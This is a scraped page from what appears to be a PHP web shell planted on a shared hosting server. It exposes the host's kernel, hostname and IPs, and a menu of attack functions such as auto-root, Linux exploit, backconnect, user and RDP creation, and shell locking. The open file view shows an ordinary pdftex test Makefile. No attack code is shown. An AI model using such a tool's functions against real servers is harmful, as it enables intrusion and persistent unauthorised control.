Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
texlive-doc /
pdftex /
tests /
12-pdf2 /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
1.37
KB
-rw-r--r--
incl1.tex
233
B
-rw-r--r--
incl2.tex
407
B
-rw-r--r--
test-compress2.tex
367
B
-rw-r--r--
test-doc1incl2.tex
281
B
-rw-r--r--
test-doc2incl1.tex
319
B
-rw-r--r--
test-doc2incl2.tex
319
B
-rw-r--r--
test-pdfmajor.tex
263
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# $Id: Makefile 817 2019-11-27 22:44:59Z karl $ # Public domain. # Test \pdfmajorversion and image inclusion. include ../Common.mak default: test-compress test-badver test-pdfmajor test-incl test-compress: test-compress2.tex $(prog) $< ! grep "warning.*Object streams" test-compress2.log >/dev/null test-badver: test-pdfmajor.tex ! $(prog) '\pdfmajorversion=0 \input $<' ! $(prog) '\pdfminorversion=-1 \input $<\end' test-pdfmajor: test-pdfmajor.tex $(prog) $< # by default, first line should start with %PDF-1. sed 1q test-pdfmajor.pdf | grep "%PDF-1" >/dev/null # # go to PDF 2. $(prog) '\pdfmajorversion=2 \input $<' sed 1q test-pdfmajor.pdf | grep "%PDF-2" >/dev/null test-incl: test-incl22 test-incl21 test-incl12 # test-incl22: test-doc2incl2.tex incl2.pdf $(prog) $< # no pdftex warning ! grep "at most version <" test-doc2incl2.log >/dev/null test-incl21: test-doc2incl1.tex incl1.pdf $(prog) $< # no pdftex warning ! grep "at most version <" test-doc2incl1.log >/dev/null test-incl12: test-doc1incl2.tex incl2.pdf $(prog) $< # pdftex warning should be in the log grep "at most version <" test-doc1incl2.log >/dev/null # # Now let's force omission of the warning. $(prog) '\pdfinclusionerrorlevel=-1 \input $<' ! grep "at most version <" test-doc1incl2.log >/dev/null incl2.pdf: incl2.tex $(prog) incl2.tex incl1.pdf: incl1.tex $(prog) incl1.tex clean: $(clean)
Close